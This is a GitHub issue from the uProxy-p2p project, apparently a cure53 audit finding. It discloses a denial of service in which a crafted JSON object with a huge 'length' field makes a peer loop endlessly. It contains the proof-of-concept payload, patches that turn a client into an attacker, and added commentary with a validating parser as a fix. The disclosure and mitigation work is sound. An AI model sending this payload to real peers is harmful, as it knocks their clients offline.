UWNetworksLab / uProxy-p2p

Internet without borders
https://www.uproxy.org/
Apache License 2.0

UP-01-002 DoS through insufficient JSON Type Verification #352

Open cure53 opened 10 years ago

cure53 commented 10 years ago

The files rtc-to-net.ts and socks-to-rtc.ts loop over an array that is received over the network as JSON - without checking that the array is not actually an object. By supplying a specifically crafted object, it is possible to remotely cause an endless loop:

PoC: { version: 1, messages: {length: 9007199254740992} }

To test this, one can modify the code using this JSON object whenever a sendSignalToPeer event is emitted. In our tests, when such a modified client connected to the server, this caused the server to loop for a few seconds before it was terminated by Chrome and had to be restarted manually.

Steps to reproduce:

_Attacker:_ Open the directory containing the chrome app, apply the following patch:

diff -rupN build/chrome/app/lib/socks-rtc/rtc-to-net/rtc-to-net.js build/chrome/app_manipulated/lib/socks-rtc/rtc-to-net/rtc-to-net.js
--- build/chrome/app/lib/socks-rtc/rtc-to-net/rtc-to-net.js    2014-08-25 10:23:33.636076223 +0200
+++ build/chrome/app_manipulated/lib/socks-rtc/rtc-to-net/rtc-to-net.js    2014-08-25 12:22:04.716132556 +0200
@@ -168,7 +168,7 @@ var RtcToNet;
                         peerId: peerId,
                         data: JSON.stringify({
                             version: 1,
-                            messages: queuedMessages
+                            messages: {length: 9007199254740992} /* causes infinite loop for the recipient */
                         })
                     });
                     queuedMessages = [];
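Review bot: going by the file name, rtc-to-net.js is the side that forwards peer traffic to the network (the party granting proxy access), whereas the reproduction steps below have the attacker requesting access and then connecting as the client, which runs the socks-to-rtc.js path; the PoC would be clearer if it stated that this hunk only fires when the attacker is the one providing the proxy, and that both files are patched so the payload is sent whichever role the attacker ends up in. Note also that `messages: queuedMessages` is replaced while `queuedMessages = [];` still runs, so the patched client discards its own queued signalling messages; acceptable for a PoC, but worth saying so the reader does not expect them to arrive.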
diff -rupN build/chrome/app/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js build/chrome/app_manipulated/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js
--- build/chrome/app/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js    2014-08-25 10:23:33.638076223 +0200
+++ build/chrome/app_manipulated/lib/socks-rtc/socks-to-rtc/socks-to-rtc.js    2014-08-25 12:23:13.930133104 +0200
@@ -49,7 +49,7 @@ var SocksToRTC;
                                 peerId: peerId,
                                 data: JSON.stringify({
                                     version: 1,
-                                    messages: queuedMessages
+                                    messages: {length: 9007199254740992} /* causes infinite loop for the recipient */
                                 })
                             });
                             queuedMessages = [];
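Review bot: the inline comment `/* causes infinite loop for the recipient */` on the `messages: {length: 9007199254740992}` line understates what the literal is: 9007199254740992 is 2^53, i.e. Number.MAX_SAFE_INTEGER + 1. A receiver loop of the form `for (i = 0; i < messages.length; i++)` terminates only after 2^53 iterations, and a `<=` or `!=` loop never does, because 2^53 + 1 is not representable as a double and `i++` at 2^53 yields 2^53 again. Either way the peer hangs; writing the literal as 2^53 (or Number.MAX_SAFE_INTEGER + 1) in the comment would make the choice of value self-explanatory.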

_Attacker:_ Request permission to proxy from the victim
_Victim:_ Grant permission to proxy
_Attacker:_ Connect to proxy

To mitigate this issue, it should be verified that incoming JSON objects conform to the expected format. It might be an option to use the “conform” helper provided by freedom.js for that very purpose.
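The loop pattern the report describes, next to a parser that checks the incoming JSON against the expected shape before anything iterates over it. This is an added example written for this page, not code from uProxy or from the cure53 report; the batch layout `{ version: 1, messages: [...] }` is taken from the PoC above, while the size caps (`MAX_MESSAGES`, `MAX_BYTES`), the handler names and the sample signalling messages are assumptions. The freedom.js "conform" helper mentioned in the report is not used because its API is not shown on this page; the hand-written checks below do the same job.

```javascript
// Added example (not uProxy code). Assumed batch shape: { version: 1, messages: [ {...}, ... ] }.

// The pattern the report describes: the loop bound is whatever `.length` the
// peer sent. After JSON.parse, an object such as { length: 9007199254740992 }
// satisfies `messages.length`, so this loop runs ~9e15 times, every iteration
// handing `undefined` to the callback. With { length: 3 } it runs three times.
function handleBatchUnchecked(batch, onSignal) {
  const messages = batch.messages;
  for (let i = 0; i < messages.length; i++) {
    onSignal(messages[i]);
  }
  return messages.length;
}

// Hardened variant: validate the decoded JSON before it reaches any loop.
const MAX_MESSAGES = 64;        // assumed cap on signals per batch
const MAX_BYTES = 64 * 1024;    // assumed cap on the raw JSON text

function parseSignalBatch(raw) {
  if (typeof raw !== 'string' || raw.length > MAX_BYTES) {
    throw new Error('signal batch: not a string or too large');
  }
  let batch;
  try {
    batch = JSON.parse(raw);
  } catch (e) {
    throw new Error('signal batch: invalid JSON');
  }
  if (batch === null || typeof batch !== 'object' || Array.isArray(batch)) {
    throw new Error('signal batch: not a JSON object');
  }
  if (batch.version !== 1) {
    throw new Error('signal batch: unsupported version');
  }
  // This is the missing check from the report: an object carrying a `length`
  // key is not an array and is rejected here instead of driving a loop.
  if (!Array.isArray(batch.messages)) {
    throw new Error('signal batch: messages is not an array');
  }
  // Even a real array is bounded, so a peer cannot send millions of entries.
  if (batch.messages.length > MAX_MESSAGES) {
    throw new Error('signal batch: too many messages');
  }
  for (const m of batch.messages) {
    if (m === null || typeof m !== 'object' || Array.isArray(m)) {
      throw new Error('signal batch: message is not an object');
    }
  }
  return batch.messages;
}

function handleBatchChecked(raw, onSignal) {
  const messages = parseSignalBatch(raw);
  for (const m of messages) {
    onSignal(m);
  }
  return messages.length;
}

// Constructed inputs: a plausible legitimate batch and the report's PoC payload.
const GOOD_BATCH = JSON.stringify({
  version: 1,
  messages: [{ type: 'offer', sdp: 'v=0' }, { type: 'candidate', candidate: 'c' }],
});
const POC_BATCH = JSON.stringify({ version: 1, messages: { length: 9007199254740992 } });

// Runs both inputs through the checked handler and reports what happened.
function demo() {
  const accepted = [];
  handleBatchChecked(GOOD_BATCH, (m) => accepted.push(m.type));
  let rejected = null;
  try {
    handleBatchChecked(POC_BATCH, () => {});
  } catch (e) {
    rejected = e.message;
  }
  return { accepted, rejected };
}
```

`handleBatchUnchecked` is kept only to show the bug; it must never be called on the PoC payload, since it really would spin for 2^53 iterations. The size caps are as important as the `Array.isArray` check: a genuine array with a huge element count is the same denial of service by another route.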

iislucas commented 10 years ago

Ooo! To avoid duplicating work, for networking code, please review the new branch that's about to land... https://github.com/uProxy/uproxy-networking/tree/iislucas-webrtc_pc3

Thanks!

iislucas commented 10 years ago

Nice find by the way!

cure53 commented 10 years ago

Aye, we shall ;) Thx!